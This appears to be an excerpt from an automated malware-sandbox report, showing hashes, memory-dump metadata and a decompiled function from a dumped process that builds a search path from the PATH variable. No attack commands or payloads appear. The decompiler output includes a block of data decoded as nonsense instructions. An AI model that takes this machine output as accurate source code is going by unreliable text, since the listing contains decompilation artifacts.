                                                      0x04964917
                                                      0x00000000
                                                      0x04964917
                                                      0x0490b1ba
                                                      0x049647f9
                                                      0x049647fc
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x049647fc
                                                      0x0490b1c0
                                                      0x0490b1c0
                                                      0x0490b1c3
                                                      0x0490b1cb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID: _vswprintf_s
                                                      • String ID:
                                                      • API String ID: 677850445-0
                                                      • Opcode ID: 9beb3a2920ae407b36ea5f927da788bdb3a476c9bc352f033b416fa5d29d121c
                                                      • Instruction ID: 38ddea89ef6fe9cf87ce4d247d75ae97e2604fb59c2ee7069bdbf25b71a8f123
                                                      • Opcode Fuzzy Hash: 9beb3a2920ae407b36ea5f927da788bdb3a476c9bc352f033b416fa5d29d121c
                                                      • Instruction Fuzzy Hash: 3F51E071E002598FEF35CFA4C844BAEBBB5BF40714F1082B9D85AAB281D77069418B95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 04932581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E04932581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t243;
				signed int _t247;
				signed int _t268;
				signed int _t270;
				intOrPtr _t272;
				signed int _t275;
				signed int _t282;
				signed int _t285;
				signed int _t293;
				signed int _t299;
				signed int _t301;
				void* _t305;
				void* _t306;
				void* _t308;
				signed int _t309;
				unsigned int _t312;
				signed int _t316;
				signed int _t318;
				signed int _t322;
				intOrPtr _t334;
				signed int _t343;
				signed int _t345;
				void* _t347;
				signed int _t348;
				signed int _t352;
				signed int _t353;
				signed int _t355;
				signed int _t357;
				signed int _t359;
				void* _t360;

				_t357 = _t359;
				_t360 = _t359 - 0x4c;
				_v8 =  *0x49fd360 ^ _t357;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t352 = 0x49fb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t312 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t299 = 0x48;
				_t332 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t343 = 0;
				_v37 = _t332;
				if(_v48 <= 0) {
					L16:
					_t45 = _t299 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t353 = 0xc0000106;
						goto L32;
					} else {
						_t352 = L04924620(_t312,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t299);
						_v52 = _t352;
						__eflags = _t352;
						if(_t352 == 0) {
							_t353 = 0xc0000017;
							goto L32;
						} else {
							 *(_t352 + 0x44) =  *(_t352 + 0x44) & 0x00000000;
							_t50 = _t352 + 0x48; // 0x48
							_t345 = _t50;
							_t332 = _v32;
							 *(_t352 + 0x3c) = _t299;
							_t301 = 0;
							 *((short*)(_t352 + 0x30)) = _v48;
							__eflags = _t332;
							if(_t332 != 0) {
								 *(_t352 + 0x18) = _t345;
								__eflags = _t332 - 0x49f8478;
								 *_t352 = ((0 | _t332 == 0x049f8478) - 0x00000001 & 0xfffffffb) + 7;
								E0494F3E0(_t345,  *((intOrPtr*)(_t332 + 4)),  *_t332 & 0x0000ffff);
								_t332 = _v32;
								_t360 = _t360 + 0xc;
								_t301 = 1;
								__eflags = _a8;
								_t345 = _t345 + (( *_t332 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t293 = E049939F2(_t345);
									_t332 = _v32;
									_t345 = _t293;
								}
							}
							_t316 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t353 = _v68;
								__eflags = 0;
								 *((short*)(_t345 - 2)) = 0;
								goto L32;
							} else {
								_t299 = _t352 + _t301 * 4;
								_v56 = _t299;
								do {
									__eflags = _t332;
									if(_t332 != 0) {
										_t243 =  *(_v60 + _t316 * 4);
										__eflags = _t243;
										if(_t243 == 0) {
											goto L30;
										} else {
											__eflags = _t243 == 5;
											if(_t243 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t299 =  *(_v60 + _t316 * 4);
										 *(_t299 + 0x18) = _t345;
										_t247 =  *(_v60 + _t316 * 4);
										__eflags = _t247 - 8;
										if(_t247 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t247 * 4 +  &M04932959))) {
												case 0:
													__ax =  *0x49f8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0494F3E0(__edi,  *0x49f848c, __ax & 0x0000ffff);
														__eax =  *0x49f8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0494F3E0(_t345, _v80, _v64);
													_t288 = _v64;
													goto L26;
												case 2:
													 *0x49f8480 & 0x0000ffff = E0494F3E0(__edi,  *0x49f8484,  *0x49f8480 & 0x0000ffff);
													__eax =  *0x49f8480 & 0x0000ffff;
													__eax = ( *0x49f8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0494F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0494F3E0(_t345, _v76, _v36);
														_t288 = _v36;
													}
													L26:
													_t360 = _t360 + 0xc;
													_t345 = _t345 + (_t288 >> 1) * 2 + 2;
													__eflags = _t345;
													L27:
													_push(0x3b);
													_pop(_t290);
													 *((short*)(_t345 - 2)) = _t290;
													goto L28;
												case 6:
													__ebx = "\\W;w\\W;w";
													__eflags = __ebx - "\\W;w\\W;w";
													if(__ebx != "\\W;w\\W;w") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0494F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\W;w\\W;w";
														} while (__ebx != "\\W;w\\W;w");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x49f8478 & 0x0000ffff = E0494F3E0(__edi,  *0x49f847c,  *0x49f8478 & 0x0000ffff);
													__eax =  *0x49f8478 & 0x0000ffff;
													__eax = ( *0x49f8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E049939F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x49f6e58 & 0x0000ffff = E0494F3E0(__edi,  *0x49f6e5c,  *0x49f6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x49f6e58 & 0x0000ffff;
													__eax = ( *0x49f6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t316 = _v16;
													_t332 = _v32;
													L29:
													_t299 = _t299 + 4;
													__eflags = _t299;
													_v56 = _t299;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t316 = _t316 + 1;
									_v16 = _t316;
									__eflags = _t316 - _v48;
								} while (_t316 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t247 =  *(_v60 + _t343 * 4);
						if(_t247 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t247 * 4 +  &M04932935))) {
							case 0:
								__ax =  *0x49f8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t332 =  &_v64;
								_v80 = E04932E3E(0,  &_v64);
								_t299 = _t299 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x49f8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x49f8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E0491EEF0(0x49f79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E0491EB70(__ecx, 0x49f79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t221 = _v72;
											__eflags = _t221;
											if(_t221 != 0) {
												L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t221);
											}
											_t222 = _v52;
											__eflags = _t222;
											if(_t222 != 0) {
												__eflags = _t353;
												if(_t353 < 0) {
													L049277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t222);
													_t222 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t312 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x49f7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L04924620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E0491EB70(__ecx, 0x49f79a0);
										__eax = _v52;
										L36:
										_pop(_t344);
										_pop(_t354);
										__eflags = _v8 ^ _t357;
										_pop(_t300);
										return E0494B640(_t222, _t300, _v8 ^ _t357, _t332, _t344, _t354);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t295 = _v56;
								if(_v56 != 0) {
									_t332 =  &_v36;
									_t297 = E04932E3E(_t295,  &_v36);
									_t312 = _v36;
									_v76 = _t297;
								}
								if(_t312 == 0) {
									goto L44;
								} else {
									_t299 = _t299 + 2 + _t312;
								}
								goto L14;
							case 6:
								__eax =  *0x49f5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x49f8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x49f8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x49f6e58 & 0x0000ffff;
								__eax = ( *0x49f6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t343 = _t343 + 1;
								if(_t343 >= _v48) {
									goto L16;
								} else {
									_t332 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					asm("int 0x29");
					asm("out 0x28, al");
					 *((intOrPtr*)(_t247 - 0x6cd81ffc)) =  *((intOrPtr*)(_t247 - 0x6cd81ffc)) - _t332;
					 *((intOrPtr*)(_t299 + 0x94 - 0x6cd9fafc)) =  *((intOrPtr*)(_t299 + 0x94 - 0x6cd9fafc)) - _t332;
					_t305 = 0x25;
					 *((intOrPtr*)(_t305 - 0x68a4cafc)) =  *((intOrPtr*)(_t305 - 0x68a4cafc)) - _t332;
					 *((intOrPtr*)(_t305 - 0x6cd77ffc)) =  *((intOrPtr*)(_t305 - 0x6cd77ffc)) - _t332;
					asm("daa");
					_t306 = _t345 + 0x18c;
					 *((intOrPtr*)(_t306 - 0x6cd7b1fc)) =  *((intOrPtr*)(_t306 - 0x6cd7b1fc)) - _t332;
					asm("daa");
					_pop(_t308);
					_t347 = _t306 + 0xd8;
					 *((intOrPtr*)(_t308 - 0x68a3cbfc)) =  *((intOrPtr*)(_t308 - 0x68a3cbfc)) - _t332;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x49dff00);
					E0495D08C(_t308, _t347, _t352);
					_v44 =  *[fs:0x18];
					_t348 = 0;
					 *_a24 = 0;
					_t309 = _a12;
					__eflags = _t309;
					if(_t309 == 0) {
						_t268 = 0xc0000100;
					} else {
						_v8 = 0;
						_t355 = 0xc0000100;
						_v52 = 0xc0000100;
						_t270 = 4;
						while(1) {
							_v40 = _t270;
							__eflags = _t270;
							if(_t270 == 0) {
								break;
							}
							_t322 = _t270 * 0xc;
							_v48 = _t322;
							__eflags = _t309 -  *((intOrPtr*)(_t322 + 0x48e1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t285 = E0494E5C0(_a8,  *((intOrPtr*)(_t322 + 0x48e1668)), _t309);
									_t360 = _t360 + 0xc;
									__eflags = _t285;
									if(__eflags == 0) {
										_t355 = E049851BE(_t309,  *((intOrPtr*)(_v48 + 0x48e166c)), _a16, _t348, _t355, __eflags, _a20, _a24);
										_v52 = _t355;
										break;
									} else {
										_t270 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t270 = _t270 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t355;
						__eflags = _t355;
						if(_t355 < 0) {
							__eflags = _t355 - 0xc0000100;
							if(_t355 == 0xc0000100) {
								_t318 = _a4;
								__eflags = _t318;
								if(_t318 != 0) {
									_v36 = _t318;
									__eflags =  *_t318 - _t348;
									if( *_t318 == _t348) {
										_t355 = 0xc0000100;
										goto L76;
									} else {
										_t334 =  *((intOrPtr*)(_v44 + 0x30));
										_t272 =  *((intOrPtr*)(_t334 + 0x10));
										__eflags =  *((intOrPtr*)(_t272 + 0x48)) - _t318;
										if( *((intOrPtr*)(_t272 + 0x48)) == _t318) {
											__eflags =  *(_t334 + 0x1c);
											if( *(_t334 + 0x1c) == 0) {
												L106:
												_t355 = E04932AE4( &_v36, _a8, _t309, _a16, _a20, _a24);
												_v32 = _t355;
												__eflags = _t355 - 0xc0000100;
												if(_t355 != 0xc0000100) {
													goto L69;
												} else {
													_t348 = 1;
													_t318 = _v36;
													goto L75;
												}
											} else {
												_t275 = E04916600( *(_t334 + 0x1c));
												__eflags = _t275;
												if(_t275 != 0) {
													goto L106;
												} else {
													_t318 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t355 = E04932C50(_t318, _a8, _t309, _a16, _a20, _a24, _t348);
											L76:
											_v32 = _t355;
											goto L69;
										}
									}
									goto L108;
								} else {
									E0491EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t355 = _a24;
									_t282 = E04932AE4( &_v36, _a8, _t309, _a16, _a20, _t355);
									_v32 = _t282;
									__eflags = _t282 - 0xc0000100;
									if(_t282 == 0xc0000100) {
										_v32 = E04932C50(_v36, _a8, _t309, _a16, _a20, _t355, 1);
									}
									_v8 = _t348;
									E04932ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t268 = _t355;
					}
					L70:
					return E0495D0D1(_t268);
				}
				L108:
			}



















































                                                      0x04932584
                                                      0x04932586
                                                      0x04932590
                                                      0x04932596
                                                      0x04932597
                                                      0x04932598
                                                      0x04932599
                                                      0x0493259e
                                                      0x049325a4
                                                      0x049325a9
                                                      0x049325ac
                                                      0x049325ae
                                                      0x049325b1
                                                      0x049325b2
                                                      0x049325b5
                                                      0x049325b8
                                                      0x049325bb
                                                      0x049325bc
                                                      0x049325bf
                                                      0x049325c2
                                                      0x049325c5
                                                      0x049325c6
                                                      0x049325cb
                                                      0x049325ce
                                                      0x049325d8
                                                      0x049325dd
                                                      0x049325de
                                                      0x049325e1
                                                      0x049325e3
                                                      0x049325e9
                                                      0x049326da
                                                      0x049326da
                                                      0x049326dd
                                                      0x049326e2
                                                      0x04975b56
                                                      0x00000000
                                                      0x049326e8
                                                      0x049326f9
                                                      0x049326fb
                                                      0x049326fe
                                                      0x04932700
                                                      0x04975b60
                                                      0x00000000
                                                      0x04932706
                                                      0x04932706
                                                      0x0493270a
                                                      0x0493270a
                                                      0x0493270d
                                                      0x04932713
                                                      0x04932716
                                                      0x04932718
                                                      0x0493271c
                                                      0x0493271e
                                                      0x04975b6c
                                                      0x04975b6f
                                                      0x04975b7f
                                                      0x04975b89
                                                      0x04975b8e
                                                      0x04975b93
                                                      0x04975b96
                                                      0x04975b9c
                                                      0x04975ba0
                                                      0x04975ba3
                                                      0x04975bab
                                                      0x04975bb0
                                                      0x04975bb3
                                                      0x04975bb3
                                                      0x04975ba3
                                                      0x04932724
                                                      0x04932726
                                                      0x04932729
                                                      0x0493272c
                                                      0x0493279d
                                                      0x0493279d
                                                      0x049327a0
                                                      0x049327a2
                                                      0x00000000
                                                      0x0493272e
                                                      0x0493272e
                                                      0x04932731
                                                      0x04932734
                                                      0x04932734
                                                      0x04932736
                                                      0x04975bc1
                                                      0x04975bc1
                                                      0x04975bc4
                                                      0x00000000
                                                      0x04975bca
                                                      0x04975bca
                                                      0x04975bcd
                                                      0x00000000
                                                      0x04975bd3
                                                      0x00000000
                                                      0x04975bd3
                                                      0x04975bcd
                                                      0x0493273c
                                                      0x0493273c
                                                      0x04932742
                                                      0x04932747
                                                      0x0493274a
                                                      0x0493274d
                                                      0x04932750
                                                      0x00000000
                                                      0x04932756
                                                      0x04932756
                                                      0x00000000
                                                      0x04932902
                                                      0x04932908
                                                      0x0493290b
                                                      0x00000000
                                                      0x04932911
                                                      0x0493291c
                                                      0x04932921
                                                      0x00000000
                                                      0x04932921
                                                      0x00000000
                                                      0x00000000
                                                      0x04932880
                                                      0x04932887
                                                      0x0493288c
                                                      0x00000000
                                                      0x00000000
                                                      0x04932805
                                                      0x0493280a
                                                      0x04932814
                                                      0x04932816
                                                      0x00000000
                                                      0x00000000
                                                      0x0493281e
                                                      0x04932821
                                                      0x04932823
                                                      0x00000000
                                                      0x04932829
                                                      0x04932829
                                                      0x04932831
                                                      0x0493283c
                                                      0x0493283e
                                                      0x00000000
                                                      0x0493283e
                                                      0x00000000
                                                      0x00000000
                                                      0x0493284e
                                                      0x04932850
                                                      0x04932851
                                                      0x04932854
                                                      0x04932857
                                                      0x0493285a
                                                      0x0493285c
                                                      0x0493285d
                                                      0x00000000
                                                      0x00000000
                                                      0x0493275d
                                                      0x04932761
                                                      0x00000000
                                                      0x04932767
                                                      0x0493276e
                                                      0x04932773
                                                      0x04932773
                                                      0x04932776
                                                      0x04932778
                                                      0x0493277e
                                                      0x0493277e
                                                      0x04932781
                                                      0x04932781
                                                      0x04932783
                                                      0x04932784
                                                      0x00000000
                                                      0x00000000
                                                      0x04975bd8
                                                      0x04975bde
                                                      0x04975be4
                                                      0x04975be6
                                                      0x04975be8
                                                      0x04975be9
                                                      0x04975bee
                                                      0x04975bf8
                                                      0x04975bff
                                                      0x04975c01
                                                      0x04975c04
                                                      0x04975c07
                                                      0x04975c0b
                                                      0x04975c0d
                                                      0x04975c0d
                                                      0x04975c15
                                                      0x04975c18
                                                      0x04975c1b
                                                      0x04975c1b
                                                      0x04975c1e
                                                      0x00000000
                                                      0x00000000
                                                      0x049328c3
                                                      0x049328c8
                                                      0x049328d2
                                                      0x049328d4
                                                      0x049328d8
                                                      0x049328db
                                                      0x04975c26
                                                      0x04975c28
                                                      0x04975c2d
                                                      0x04975c2d
                                                      0x00000000
                                                      0x00000000
                                                      0x04975c34
                                                      0x04975c36
                                                      0x04975c49
                                                      0x04975c4e
                                                      0x04975c54
                                                      0x04975c5b
                                                      0x04975c5d
                                                      0x04975c60
                                                      0x04932788
                                                      0x04932788
                                                      0x0493278b
                                                      0x0493278e
                                                      0x0493278e
                                                      0x0493278e
                                                      0x04932791
                                                      0x00000000
                                                      0x00000000
                                                      0x04932756
                                                      0x04932750
                                                      0x00000000
                                                      0x04932794
                                                      0x04932794
                                                      0x04932795
                                                      0x04932798
                                                      0x04932798
                                                      0x00000000
                                                      0x04932734
                                                      0x0493272c
                                                      0x04932700
                                                      0x049325ef
                                                      0x049325ef
                                                      0x049325ef
                                                      0x049325f2
                                                      0x049325f8
                                                      0x00000000
                                                      0x00000000
                                                      0x049325fe
                                                      0x00000000
                                                      0x049328e6
                                                      0x049328ec
                                                      0x049328ef
                                                      0x049328f5
                                                      0x049328f8
                                                      0x049328f8
                                                      0x00000000
                                                      0x049328f8
                                                      0x00000000
                                                      0x00000000
                                                      0x04932866
                                                      0x04932866
                                                      0x04932876
                                                      0x04932879
                                                      0x00000000
                                                      0x00000000
                                                      0x049327e0
                                                      0x049327e7
                                                      0x049327e9
                                                      0x049327eb
                                                      0x04975afd
                                                      0x00000000
                                                      0x04975afd
                                                      0x00000000
                                                      0x00000000
                                                      0x04932633
                                                      0x04932638
                                                      0x0493263b
                                                      0x0493263c
                                                      0x0493263e
                                                      0x04932640
                                                      0x04932642
                                                      0x04932647
                                                      0x04932649
                                                      0x0493264e
                                                      0x04932650
                                                      0x04932653
                                                      0x04932659
                                                      0x049326a2
                                                      0x049326a7
                                                      0x049326ac
                                                      0x049326b2
                                                      0x04975b11
                                                      0x04975b15
                                                      0x04975b17
                                                      0x00000000
                                                      0x049326b8
                                                      0x049326b8
                                                      0x049326ba
                                                      0x049327a6
                                                      0x049327a6
                                                      0x049327a9
                                                      0x049327ab
                                                      0x049327b9
                                                      0x049327b9
                                                      0x049327be
                                                      0x049327c1
                                                      0x049327c3
                                                      0x049327c5
                                                      0x049327c7
                                                      0x04975c74
                                                      0x04975c79
                                                      0x04975c79
                                                      0x049327c7
                                                      0x00000000
                                                      0x049326c0
                                                      0x049326c0
                                                      0x049326c3
                                                      0x049326c6
                                                      0x049326c6
                                                      0x049326c9
                                                      0x049326c9
                                                      0x00000000
                                                      0x049326c9
                                                      0x049326ba
                                                      0x0493265b
                                                      0x0493265b
                                                      0x0493265e
                                                      0x04932667
                                                      0x0493266d
                                                      0x04932677
                                                      0x0493267c
                                                      0x0493267f
                                                      0x04932681
                                                      0x04975b49
                                                      0x04975b4e
                                                      0x049327cd
                                                      0x049327d0
                                                      0x049327d1
                                                      0x049327d2
                                                      0x049327d4
                                                      0x049327dd
                                                      0x04932687
                                                      0x04932687
                                                      0x0493268a
                                                      0x0493268b
                                                      0x0493268e
                                                      0x0493268f
                                                      0x04932691
                                                      0x04932696
                                                      0x04932698
                                                      0x0493269d
                                                      0x0493269f
                                                      0x00000000
                                                      0x0493269f
                                                      0x04932681
                                                      0x00000000
                                                      0x00000000
                                                      0x04932846
                                                      0x00000000
                                                      0x00000000
                                                      0x04932605
                                                      0x0493260a
                                                      0x0493260c
                                                      0x04932611
                                                      0x04932616
                                                      0x04932619
                                                      0x04932619
                                                      0x0493261e
                                                      0x00000000
                                                      0x04932624
                                                      0x04932627
                                                      0x04932627
                                                      0x00000000
                                                      0x00000000
                                                      0x04975b1f
                                                      0x00000000
                                                      0x00000000
                                                      0x04932894
                                                      0x0493289b
                                                      0x0493289d
                                                      0x049328a1
                                                      0x04975b2b
                                                      0x04975b2e
                                                      0x04975b2e
                                                      0x049328a7
                                                      0x049328a9
                                                      0x04975b04
                                                      0x04975b09
                                                      0x04975b09
                                                      0x04975b09
                                                      0x00000000
                                                      0x00000000
                                                      0x04975b35
                                                      0x04975b3c
                                                      0x049328fb
                                                      0x049328fb
                                                      0x049326cc
                                                      0x049326cc
                                                      0x049326d0
                                                      0x00000000
                                                      0x049326d2
                                                      0x049326d2
                                                      0x00000000
                                                      0x049326d2
                                                      0x00000000
                                                      0x00000000
                                                      0x049325fe
                                                      0x0493292d
                                                      0x04932930
                                                      0x04932935
                                                      0x0493293a
                                                      0x04932946
                                                      0x0493294e
                                                      0x04932952
                                                      0x0493295a
                                                      0x04932962
                                                      0x04932963
                                                      0x04932966
                                                      0x0493296e
                                                      0x04932972
                                                      0x04932973
                                                      0x04932976
                                                      0x0493297e
                                                      0x0493297f
                                                      0x04932980
                                                      0x04932981
                                                      0x04932982
                                                      0x04932983
                                                      0x04932984
                                                      0x04932985
                                                      0x04932986
                                                      0x04932987
                                                      0x04932988
                                                      0x04932989
                                                      0x0493298a
                                                      0x0493298b
                                                      0x0493298c
                                                      0x0493298d
                                                      0x0493298e
                                                      0x0493298f
                                                      0x04932990
                                                      0x04932992
                                                      0x04932997
                                                      0x049329a3
                                                      0x049329a6
                                                      0x049329ab
                                                      0x049329ad
                                                      0x049329b0
                                                      0x049329b2
                                                      0x04975c80
                                                      0x049329b8
                                                      0x049329b8
                                                      0x049329bb
                                                      0x049329c0
                                                      0x049329c5
                                                      0x049329c6
                                                      0x049329c6
                                                      0x049329c9
                                                      0x049329cb
                                                      0x00000000
                                                      0x00000000
                                                      0x049329cd
                                                      0x049329d0
                                                      0x049329d9
                                                      0x049329db
                                                      0x049329dd
                                                      0x04932a7f
                                                      0x04932a84
                                                      0x04932a87
                                                      0x04932a89
                                                      0x04975ca1
                                                      0x04975ca3
                                                      0x00000000
                                                      0x04932a8f
                                                      0x04932a8f
                                                      0x00000000
                                                      0x04932a8f
                                                      0x00000000
                                                      0x049329e3
                                                      0x049329e3
                                                      0x049329e3
                                                      0x00000000
                                                      0x049329e3
                                                      0x049329dd
                                                      0x00000000
                                                      0x049329db
                                                      0x049329e6
                                                      0x049329e9
                                                      0x049329eb
                                                      0x049329ed
                                                      0x049329f3
                                                      0x049329f5
                                                      0x049329f8
                                                      0x049329fa
                                                      0x04932a97
                                                      0x04932a9a
                                                      0x04932a9d
                                                      0x04932add
                                                      0x00000000
                                                      0x04932a9f
                                                      0x04932aa2
                                                      0x04932aa5
                                                      0x04932aa8
                                                      0x04932aab
                                                      0x04975cab
                                                      0x04975caf
                                                      0x04975cc5
                                                      0x04975cda
                                                      0x04975cdc
                                                      0x04975cdf
                                                      0x04975ce5
                                                      0x00000000
                                                      0x04975ceb
                                                      0x04975ced
                                                      0x04975cee
                                                      0x00000000
                                                      0x04975cee
                                                      0x04975cb1
                                                      0x04975cb4
                                                      0x04975cb9
                                                      0x04975cbb
                                                      0x00000000
                                                      0x04975cbd
                                                      0x04975cbd
                                                      0x00000000
                                                      0x04975cbd
                                                      0x04975cbb
                                                      0x04932ab1
                                                      0x04932ab1
                                                      0x04932ac4
                                                      0x04932ac6
                                                      0x04932ac6
                                                      0x00000000
                                                      0x04932ac6
                                                      0x04932aab
                                                      0x00000000
                                                      0x04932a00
                                                      0x04932a09
                                                      0x04932a0e
                                                      0x04932a21
                                                      0x04932a24
                                                      0x04932a35
                                                      0x04932a3a
                                                      0x04932a3d
                                                      0x04932a42
                                                      0x04932a59
                                                      0x04932a59
                                                      0x04932a5c
                                                      0x04932a5f
                                                      0x04932a5f
                                                      0x049329fa
                                                      0x049329f3
                                                      0x04932a64
                                                      0x04932a64
                                                      0x04932a6b
                                                      0x04932a6b
                                                      0x04932a6d
                                                      0x04932a72
                                                      0x04932a72
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000A.00000002.610790458.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                                                      • Associated: 0000000A.00000002.611106097.00000000049FB000.00000040.00000001.sdmp Download File
                                                      • Associated: 0000000A.00000002.611132005.00000000049FF000.00000040.00000001.sdmp Download File
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PATH
                                                      • API String ID: 0-1036084923
                                                      • Opcode ID: 35e4c4746c257a06f9646bca733563df789d8917a690452e030e2ea8e8b2bde3
                                                      • Instruction ID: cccaf330cb7c267536078d89bb1ebceb107f8352ae4598f8647017389689dfed
